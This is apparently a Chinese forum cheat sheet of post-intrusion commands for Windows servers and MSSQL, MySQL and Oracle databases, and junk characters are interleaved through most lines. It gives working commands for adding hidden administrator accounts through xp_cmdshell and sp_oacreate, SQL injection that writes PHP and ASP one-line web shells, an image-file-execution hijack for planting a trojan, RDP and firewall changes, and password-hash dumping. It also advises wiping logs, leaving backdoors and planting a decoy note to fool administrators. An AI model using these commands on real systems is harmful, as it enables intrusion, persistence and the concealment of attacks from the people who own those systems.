) A. N6 B6 J, R1 \# n( v% l, o
1.net user administrator /passwordreq:no
0 s! `7 j! w: s' k e+ h这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了+ l* b/ R3 ?; \, X
2.比较巧妙的建克隆号的步骤1 \% d) h% @, o1 U8 n" m
先建一个user的用户# I& g1 j4 k2 x; z U
然后导出注册表。然后在计算机管理里删掉8 G5 n- v ?6 u$ C" p
在导入,在添加为管理员组( Z$ e! a l9 D) ] {
3.查radmin密码4 U7 O# _9 H+ `. z+ ]% q C/ ~# w
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
9 {5 r- t( ^ o3 X, k6 |' C4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
) s% o, F' M# f1 k8 w建立一个"services.exe"的项+ f9 p2 O% w$ p5 O; {
再在其下面建立(字符串值)
& `' z) n5 ]4 c. J键值为mu ma的全路径- \- z6 u+ F# W, o1 U0 O: j
5.runas /user:guest cmd7 r( d" n7 S$ w/ _) c- C) p9 H
测试用户权限!- U# V0 R' r# O! W6 v% `
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
7 ^! i* l7 c4 M; X# |8 o" O+ q, [7.入侵后漏洞修补、痕迹清理,后门置放:
, l8 f' i/ s& V7 g& i- N基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
5 M. C# i6 ~7 V+ }! R8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c- g' }# W- ]' x
* u/ f* t1 J" R- \7 ^! ~( ofor example2 `8 W( [3 u4 n+ s; O( K0 Q4 S
$ _" n7 y/ k- i8 {' B- |declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
2 e; e7 D# @" O3 k+ ~& Z6 D) }2 v; X
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
, Y1 O8 k* T# F2 o5 F9 X, I$ {
: K/ o B* {3 K# [9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
9 i+ Y. I7 K: ?如果要启用的话就必须把他加到高级用户模式
2 Z4 U8 Z9 k. } _. ~& j; K可以直接在注入点那里直接注入
( P T% W8 n- Y- p* U5 ^ u. }id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
, `; T) M+ @6 [* T4 W! r然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--* q% B- T. F( T. R: e* t# R
或者
! Y3 f. g- _) L8 bsp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
R) {6 L3 |0 y5 {来恢复cmdshell。# @- C" J( ^0 \9 e s; g
. @6 x M# \6 p3 J# A: x( J
分析器( c7 d: H2 l' D# ~
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
- R* H1 e4 V; C! a( S然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")3 O% V1 G2 ~2 e* W/ c* v# E
10.xp_cmdshell新的恢复办法/ s! ]! g" g6 X7 `
xp_cmdshell新的恢复办法3 ?3 n8 E% u+ \0 J
扩展储存过程被删除以后可以有很简单的办法恢复:
- t- ]- k9 J7 Y; E7 o删除
; Z- ^! Q! A1 U' P7 i! kdrop procedure sp_addextendedproc' s; u, h' V) \! i
drop procedure sp_oacreate
$ l1 L/ Q& H+ Yexec sp_dropextendedproc 'xp_cmdshell'2 H2 G- |7 m' t. G7 a0 `( s
2 f4 J7 `7 Z! f$ ]/ O9 h: x+ _
恢复
1 z5 G, N/ J+ }dbcc addextendedproc ("sp_oacreate","odsole70.dll")
9 y# ~' h3 i$ l( udbcc addextendedproc ("xp_cmdshell","xplog70.dll")
1 H: a6 E7 W9 L" a5 x# h. W7 D8 b$ _) x4 |. n; D
这样可以直接恢复,不用去管sp_addextendedproc是不是存在+ ?% q0 u4 g l& Z2 n/ O+ ^
. Y3 a- A/ Y( v. V# I. T+ B3 A! o
-----------------------------
6 \+ {+ X2 d" ^3 A* i; K* N6 a2 z- W. M0 M
删除扩展存储过过程xp_cmdshell的语句:' i" u8 d. o' D$ E) s
exec sp_dropextendedproc 'xp_cmdshell' K2 M0 L i% L; U% L: y1 F
- B: h4 @' j0 f6 m2 H; P$ d
恢复cmdshell的sql语句
& A6 ]) L+ D- ~, k8 e1 Aexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
4 B' S( h( k/ \6 i1 p* W5 w
o9 H% B5 U7 {9 }0 G* f5 O6 }
5 u4 p" `# l- H( B- p开启cmdshell的sql语句0 y1 ]& o6 n1 E$ b9 C0 V
$ v/ e% p- l9 y3 J1 H, T* _# n
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'1 y' N; k$ h2 r* {
9 O6 t* a( V$ e6 c* C& A i判断存储扩展是否存在- w4 r' H% B( c( s
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
/ k& S/ g0 \. t. ?: [1 V; _返回结果为1就ok
3 t% A/ r1 D" {6 i- H, y0 @5 j0 b- _1 d
恢复xp_cmdshell9 R+ A% h+ W0 [, R; u$ |0 n% o3 @
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
; t$ z) N6 I" H) x# ~) `6 \返回结果为1就ok0 k( S. b, D9 l; D6 Z& N
; k4 l4 \. M$ A! y7 B否则上传xplog7.0.dll" W" l- d$ |* f
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'8 q1 V& J0 N5 g+ R
3 T4 C8 C4 G+ g' Z6 P) ]% ~堵上cmdshell的sql语句
# ?1 L5 z0 B! l* Tsp_dropextendedproc "xp_cmdshel$ G/ y3 J) a; K0 o: ` [1 m2 \; P
------------------------- k' H: O& ^2 o3 P. @7 ^
清除3389的登录记录用一条系统自带的命令:
( Z$ {8 W# i4 K* y3 creg delete "hkcu\Software\Microsoft\Terminal Server Client" /f; h' K D/ e; O# N4 T
) e+ H" Y }2 |' q$ F- F5 P
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
5 w- z9 N$ t9 [在 mysql里查看当前用户的权限
) t# S- ?: L' u" T1 v$ Pshow grants for 1 R' T$ ~/ _! ?9 b' {" Z! L# C
2 H! f5 r- S0 B1 k4 N8 N
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
# o$ K5 j0 r: e/ B; K8 `" b
& m Q; ~- K; z# e
; p) ^0 i! @9 S8 N1 lCreate USER 'itpro'@'%' IDENTIFIED BY '123';
! V z& I% p; a9 l7 [
: u3 I7 G1 Y6 M2 L4 NGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
) x+ }; s; A& h# Z% p" _8 Z3 B N! ?$ s- A
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0$ @5 |! Q' F7 ^9 Y
& }0 h0 D/ k% c* H1 U
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;/ X+ ~8 f; l' ?) ^3 T
/ U0 K3 L- D) S6 A" k1 w
搞完事记得删除脚印哟。
- x9 U6 l% N' O0 H+ K: ?( ]% S/ i4 |2 z" {, E5 ?9 {% i5 J
Drop USER 'itpro'@'%';+ \! z5 Q( ~% f( h# Y) Z- y
/ `# K9 `* i3 }' X8 @
Drop DATABASE IF EXISTS `itpro` ;: U2 A* }, B$ T/ p/ W
% D- @. w! G7 I3 {
当前用户获取system权限
3 g4 R1 D7 v$ I, C7 n% [; a! csc Create SuperCMD binPath= "cmd /K start" type= own type= interact7 N2 H9 e0 }6 }2 c
sc start SuperCMD H5 b% z) h+ n% a
程序代码
1 ]9 X1 T% e }1 |" [4 C1 i6 E<SCRIPT LANGUAGE="VBScript">
$ D0 s, \' f t. v) u9 F9 Lset wsnetwork=CreateObject("WSCRIPT.NETWORK")
8 e* I$ X- ]* } r$ W$ Vos="WinNT://"&wsnetwork.ComputerName0 y' ]+ d8 w" p8 V! P
Set ob=GetObject(os), k' s2 f j& w. I6 O9 L
Set oe=GetObject(os&"/Administrators,group")
6 u' r7 O* d# _8 _4 _" b; m; o Q. WSet od=ob.Create("user","nosec")
8 }( k; o! t* t4 g, O8 hod.SetPassword "123456abc!@#"2 Y) K" e/ Y% X* Y+ h7 b9 d6 q$ O
od.SetInfo
2 [- t9 f$ }- N) Y5 A+ W. b5 @Set of=GetObject(os&"/nosec",user)
6 N5 L# R, L# i1 j! }. H9 @: E" Z+ |5 |. Eoe.add os&"/nosec"
) p1 N7 ]% p \</Script>+ k% k# e! U/ Q; O" { @1 L+ Q( _
<script language=javascript>window.close();</script>$ B2 k) Y6 B) d
! k( I3 e; `% o) O- ~, H& l2 F7 B3 l* l
6 E4 i8 ]0 h2 o( k1 | o8 N3 }2 z) M' w; ^9 h) a8 I, V$ G. r0 ^
突破验证码限制入后台拿shell% | v4 ]2 J2 B, n. v* a1 G
程序代码
0 x8 s* R- V2 ?4 sREGEDIT4
5 ]. g$ J9 d. B7 x[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] 7 k) Q3 t8 j$ w* z) a$ F
"BlockXBM"=dword:00000000
: ~: i7 d" p, f$ }
% @$ i$ @% w+ C6 r保存为code.reg,导入注册表,重器IE
4 W8 E, D7 h4 L8 p0 i" Q就可以了3 o, d( b/ r- L+ O) G) p7 x3 ?
union写马, ~3 {; b- L: E& \& F, ~1 r3 S1 G
程序代码2 k1 J$ T/ g6 z: l
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
5 P+ h4 F8 B, X- X2 ~4 V7 I0 z2 O) j& o. Q' [% N6 v
应用在dedecms注射漏洞上,无后台写马
- L2 L( k6 K! b; m/ udedecms后台,无文件管理器,没有outfile权限的时候
% A8 T- p& H* }$ @, S- k在插件管理-病毒扫描里
$ ^1 [ e- {. B& r写一句话进include/config_hand.php里
1 `# s! O u: r6 D8 l程序代码7 {8 B5 D+ |+ N
>';?><?php @eval($_POST[cmd]);?>4 r% _) Z6 N" p- B* x8 X! A
- `" l- O) T0 C: F
" I2 [8 v7 x! `3 {如上格式
) f4 c8 v) z$ R# H: g" E) s4 E& ^, Q r7 @+ F- b8 ^; W% M
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解. a9 Y: z( K+ i
程序代码+ {8 \' w2 k) Q$ {! K y, g
select username,password from dba_users;
, |2 f* _2 m6 o6 Q
0 u4 k) C) \4 C: L; O* N$ c n$ u
. d0 |9 ]; T8 f) Q2 }6 l, Dmysql远程连接用户
# {2 m( I+ ~/ ^1 S9 i$ Q程序代码 F0 o F: h, w0 w. d( r, V
$ k/ A' v: Z: A, _ I+ n2 w, ?
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
. y) r% \8 q3 v0 S) J7 AGRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
3 b6 z- z5 x$ u) [$ yMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0( Z M+ C* _5 L+ U
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;5 l4 N9 i3 d8 t- X( }6 e/ A2 c3 T
; p1 k) n4 F# J+ L
( s0 k- O2 S; M" T; m
- n; d# N! } p- K4 @
' c5 G& v$ |# |0 hecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0* @3 H; G) M w6 V l4 ]4 K
5 h4 Q, m# ?. _
1.查询终端端口
' b* r6 b9 {; a1 J9 n j
+ O4 v7 C2 T3 ~2 p; A' L- d) jxp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber4 G0 O1 j8 ?$ c" y: w% i! L
% @4 ?7 Q& E# q通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"8 t) l; A: K- x1 o5 V9 ?" n
type tsp.reg- _: ^1 h: G" d2 d4 _
5 K, b( i9 @& c1 S; }' A2.开启XP&2003终端服务
M2 k( E- x& |. @/ B$ G+ v/ g
( F k' q+ t: Z
! Z) s) R" q L8 Z, xREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
0 e1 \0 w# r7 A* l5 }+ P* R* K& D. e F9 x' w1 y! Z0 W7 v+ j) L
) }# r8 W% M1 P0 W2 J$ |
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f# L& `( {# ]2 B; D% c) c8 i. M
( \( ?" ]0 |( ]1 O7 m) ~, y3.更改终端端口为20008(0x4E28)
' N% r% ^1 j" ^2 E. o6 i6 o* T5 p/ U: n
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
8 s. c7 S Q% \$ u& g- X) A$ d5 Q: q* `* t5 U! l
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
& c( Y' U% L5 F; _
1 p1 J, H. W9 }- g2 o4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
# ?7 V" v# ~: r8 z6 X* ^/ [6 A' P2 z4 b# ` Q6 R4 T
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f- C; o7 U c: E) o: Y
# B C$ v* H# Z2 m, }& H. Z4 E+ @! R5 L% `. r6 n7 z# f/ w
5.开启Win2000的终端,端口为3389(需重启)
) p# }. L# u" x: g. q3 j- Z) u0 X V
echo Windows Registry Editor Version 5.00 >2000.reg
) B& D) @; n* @: iecho. >>2000.reg5 M. \0 L: e( K4 }2 ?
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg / y0 S6 r9 g5 C/ ?6 }7 @+ c$ F
echo "Enabled"="0" >>2000.reg * K! _. Z ?# m4 d/ P6 {' J
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
4 w. b" G, p |; decho "ShutdownWithoutLogon"="0" >>2000.reg
; K1 W# o' _& Iecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg - X2 o( z5 R$ T; |4 G
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg 6 N) p, P+ r: [+ H4 ^- {6 f
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg / y/ e' P h% g. K
echo "TSEnabled"=dword:00000001 >>2000.reg
" T0 T- y! s K! C% J1 l4 I/ Techo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg 3 w6 H4 p, U. ?4 i( t5 M. M' ^
echo "Start"=dword:00000002 >>2000.reg
" u8 X( n9 t4 z7 }1 aecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
1 U4 s: z: ^+ T; ]5 Zecho "Start"=dword:00000002 >>2000.reg & E# L7 p& G! X% I
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg ; X$ {1 ?' G5 ~
echo "Hotkey"="1" >>2000.reg 4 g+ Q: m6 ?3 x
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
( Z- Z3 y/ d: Z% Lecho "ortNumber"=dword:00000D3D >>2000.reg
0 [0 W$ {- E1 s, ~echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
5 C5 a& C4 w8 t' Fecho "ortNumber"=dword:00000D3D >>2000.reg% B3 `+ k# Q/ G" n3 i1 U# d
; s4 n5 E1 W6 b% d( w& E& ]* |8 I6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)* X( g2 H6 c6 u5 J' B. N
0 s) N- h5 s1 M6 W: f@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
# ~* M5 X( y2 e2 `(set inf=InstallHinfSection DefaultInstall)5 }1 d' i7 y0 f; n; P8 D
echo signature=$chicago$ >> restart.inf, a1 _6 c X% A' b1 D
echo [defaultinstall] >> restart.inf0 H6 X- n* u: @* Z' ^
rundll32 setupapi,%inf% 1 %temp%\restart.inf
5 W5 i1 E' S, o+ V1 L2 t9 L4 J1 g6 B; d z- q
+ l m$ k( K0 X7 \
7.禁用TCP/IP端口筛选 (需重启)" [5 V7 K# ?% p
! Q% `! P, K5 r! ~, H2 cREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
0 Z$ f9 y& I* k7 Q; w5 [
0 m, H% [3 G* o4 u D" e2 v, y8.终端超出最大连接数时可用下面的命令来连接
7 k! Q. t5 Y! {+ u) D) \8 q$ N* P3 Q% o6 c
mstsc /v:ip:3389 /console; g1 _) @2 U2 F2 r3 c
- @. S* W C9 M9.调整NTFS分区权限
+ L7 b# Q8 S1 ]5 M
( n- g0 Y) S' X/ i2 N jcacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
7 ~+ [* s: t( k0 G9 n6 o# E& G. k5 e, p3 v( y2 P+ ]0 h
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)* O' L" ~# o# ^8 F2 ]) L
* d# P! r. s# r# e% u7 z& h2 h7 }1 m------------------------------------------------------' \+ l/ @; }% a8 `0 k7 U
3389.vbs 1 q* q, B. i1 G% A
On Error Resume Next
" Z3 I- V; t! U0 n4 oconst HKEY_LOCAL_MACHINE = &H800000021 F2 {& Y& V' q7 B+ C
strComputer = "."
3 M1 x9 [6 t2 o) a% S$ `: p7 r( t( eSet StdOut = WScript.StdOut1 X6 s8 b `% T1 x6 W: e
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
2 _0 P2 i, M# n) H1 }strComputer & "\root\default:StdRegProv")
8 G, P5 Z& j# i5 A7 ?: n" xstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
' u7 k3 {2 j1 koreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
8 Z# A/ H! j% k% \strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"8 t3 }% Q1 K- r2 K) d- J
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath) G. O4 o8 j% i! _* N: g
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
( g& P, v3 f2 @/ u% rstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
K" P3 U) ^7 W6 y; ^1 u6 s; n8 L3 }strValueName = "fDenyTSConnections"
% t1 U7 ]# k9 V1 ?$ Z3 Y! zdwValue = 0! i. M) B6 E& a$ E; O
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue! H! L+ a+ v; a$ p$ X' h# y
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp", {9 T- w: x# K
strValueName = "ortNumber"
: K+ s, J9 T2 i" zdwValue = 3389
+ r; z9 U" S/ A: z+ u2 N. k1 P( Q9 Qoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue# B' A, q. G& P+ p% R
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
( B" S. O: D0 `2 D: k( KstrValueName = "ortNumber"4 E# P5 N$ R0 b4 f7 m( A. `
dwValue = 3389
" e4 K, z, v: }6 loreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue8 K- c* f Y& y2 |
Set R = CreateObject("WScript.Shell") 5 [- r) ^! e: y* W: k6 N& z2 B
R.run("Shutdown.exe -f -r -t 0")
* x2 Y) T7 I& f0 T# K8 O; ]
9 M+ g8 r- Z0 @% A& h; ^" `: y删除awgina.dll的注册表键值; L" d% e0 n' {9 }; k/ o5 d: E
程序代码
7 L+ N- |' Z: S% v, ]- I, o: E/ J/ j p' F5 ?8 u. q" A: C: r4 T
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f7 x' y* q! P: V- i' \( N
& C" k4 q9 U3 y6 v
( s9 y8 f) l: [: x( c, t
% R6 [$ Y0 z5 m2 U# g% X
0 h; I, t! _. j1 J' U程序代码
0 P) V! B7 |+ j+ ~, ~" fHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash; ?8 B7 M1 }" |* A' w) w) T
8 @$ {1 _) ]& Y; ]设置为1,关闭LM Hash
) V6 t7 Z" `# Z; c2 S# S0 \
, l5 [+ \ K$ b- z" u数据库安全:入侵Oracle数据库常用操作命令
7 U7 l2 X& e, T5 x$ |' u- f7 |最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。6 y3 u! A7 B. \; R* ?
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。9 u# U: |% l2 f2 x
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
, s7 c" c$ j8 }# w! [& n3、SQL>connect / as sysdba ;(as sysoper)或2 w6 Z) r3 X. r
connect internal/oracle AS SYSDBA ;(scott/tiger)
0 {/ q# ?) {, ~conn sys/change_on_install as sysdba;& h5 Q+ ^+ S& \8 P2 c2 n' h/ Y
4、SQL>startup; 启动数据库实例! h& h/ o' `, U* y, R
5、查看当前的所有数据库: select * from v$database;3 W& p. N. M0 w, y6 [. h& y. o
select name from v$database;9 z7 L' T6 a( I# u. q6 K: J; R8 ~
6、desc v$databases; 查看数据库结构字段7 Y5 q3 t7 [# f3 }4 k& t! ?9 r
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
& R: V6 R; m/ {: e% z [7 f% TSQL>select * from V_$PWFILE_USERS;
% _6 j# o4 C5 G% T9 i# oShow user;查看当前数据库连接用户
& d- F# Y& w: ^8、进入test数据库:database test;
0 U. f1 P/ ^: ]+ a. ]; p; [; _9、查看所有的数据库实例:select * from v$instance;( U: d2 W+ n/ R: G7 \; M1 C
如:ora9i- c! P# y, d+ D" _8 R
10、查看当前库的所有数据表:+ v: [7 s$ W# c t( u5 a
SQL> select TABLE_NAME from all_tables;% K, X8 c2 h6 l. T' f: b+ \
select * from all_tables;* X, v8 o' _0 u+ o
SQL> select table_name from all_tables where table_name like '%u%';
( M3 y, Q ]8 o3 fTABLE_NAME9 d/ k @, U* n/ ?
------------------------------
4 Y1 u g7 s# `+ @- M_default_auditing_options_
; o D; c2 i8 Q# L11、查看表结构:desc all_tables;1 v/ ]' I6 K" O3 c2 O6 v4 h
12、显示CQI.T_BBS_XUSER的所有字段结构:+ |2 G2 G; P* k0 u* k' j3 w: v
desc CQI.T_BBS_XUSER; ?5 [" D' A: i1 r) f/ G# b
13、获得CQI.T_BBS_XUSER表中的记录: i2 _6 K2 f6 s9 O
select * from CQI.T_BBS_XUSER;
- K+ r/ k( s0 |7 g14、增加数据库用户:(test11/test)
5 h; e$ P. [. x) Ucreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;, Q- U& H3 Y0 K+ t6 g
15、用户授权:
4 ~2 l/ d7 C" R& [3 Rgrant connect,resource,dba to test11;
p- {8 [6 ~+ o9 e% ~7 f# W* pgrant sysdba to test11;
, a: ~ o$ N& L6 i2 Dcommit;
! I# k( T s" o$ s16、更改数据库用户的密码:(将sys与system的密码改为test.)
, J, ?' }) u$ y) B( `# calter user sys indentified by test;' p. p* Y1 L, a# m1 [' q- b
alter user system indentified by test;0 P+ k0 ^& Z8 z8 }
$ o4 k! f( e$ k- v
applicationContext-util.xml
( x: [# u' I5 k+ E% FapplicationContext.xml' D' M7 o4 {' b0 @4 l# f6 n: ^& G2 {* G
struts-config.xml
4 l- {/ _- W6 Q9 Y4 `web.xml
L! `8 a B8 p! Kserver.xml
& l% f* x: G' i( [ e2 C @& ftomcat-users.xml
8 }' l, o7 [* Uhibernate.cfg.xml7 ], a- R; t4 ^* x7 C
database_pool_config.xml+ P" d: H3 |( L2 A' j0 A/ Z) o
( v* h0 W1 a% W v$ n7 Y4 r$ Q4 c4 n" u) Q3 h; [) g0 |
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
0 H0 |& {6 N1 p\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini( Z9 i6 Q6 W! e$ t. |* E
\WEB-INF\struts-config.xml 文件目录结构* Z8 b7 e2 n3 Y Q4 z
; l5 ^( y ?4 A+ q
spring.properties 里边包含hibernate.cfg.xml的名称
$ m. V6 d; k V* Y& P& Q( }- R6 n8 M7 {# p7 e2 I1 y! h
7 `5 Z+ n& e! S* _6 K
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml8 p0 m, E- J& g5 m
; w; H, Q# t, P( t/ r
如果都找不到 那就看看class文件吧。。
, ^' p8 s0 S8 M3 U" I
" J7 A7 r- V+ L' M测试1:4 @' S$ y! V& _# B& i
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
, I7 G% C- m+ O" Z' P+ J: B- l" A+ ^& N: t h& u3 k
测试2:. H& { {' D/ N O/ v$ F
I, e# O1 k8 O9 y- V# B
create table dirs(paths varchar(100),paths1 varchar(100), id int)$ a) k2 x7 y b% V! K2 m; w. R! D
. O' h+ z" D9 w, Y& Q2 edelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--" e: O9 m) ?6 V% g9 K/ ]* k
. @# p; E+ {5 _. @/ ]) e
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
: f1 K$ Y0 o2 X( z. ~$ |
# v: z% R$ l3 m p查看虚拟机中的共享文件:+ F7 M9 ]$ x$ k g5 }6 w) e/ ^6 p# v6 N* o" s
在虚拟机中的cmd中执行
( `* R4 f* n0 ~+ \; D\\.host\Shared Folders
( D' I H: m4 b/ ^0 m* w1 h' E3 [+ m3 `0 k0 I" C
cmdshell下找终端的技巧
) ]* L% p4 g) D, ^! \找终端:
* O# y& ?) w' y- H; v0 j! H" z第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! ! w' i' B2 d7 x8 x$ T6 A
而终端所对应的服务名为:TermService
: W# U) m2 A! P第二步:用netstat -ano命令,列出所有端口对应的PID值!
6 a2 a, ^0 Y6 j6 z3 Z2 k3 y$ a9 L2 z 找到PID值所对应的端口
9 V, D' `8 U- P( R4 L4 X& @' t( t; U# K% n( L4 c2 u1 Q. r
查询sql server 2005中的密码hash
- X9 j6 P T/ k8 L" Y. \( S9 a! xSELECT password_hash FROM sys.sql_logins where name='sa'- ?5 N6 I c1 Y7 C q% T/ G
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
" @; v7 d$ B$ o' F3 ^0 b- U3 Zaccess中导出shell
/ S3 }* |4 B( z; K2 Q" R
) L8 _1 |* p( Y8 S6 j: r7 C2 X中文版本操作系统中针对mysql添加用户完整代码:$ P5 n2 @1 l% m) [
& k U, y+ I% u( M$ _use test;
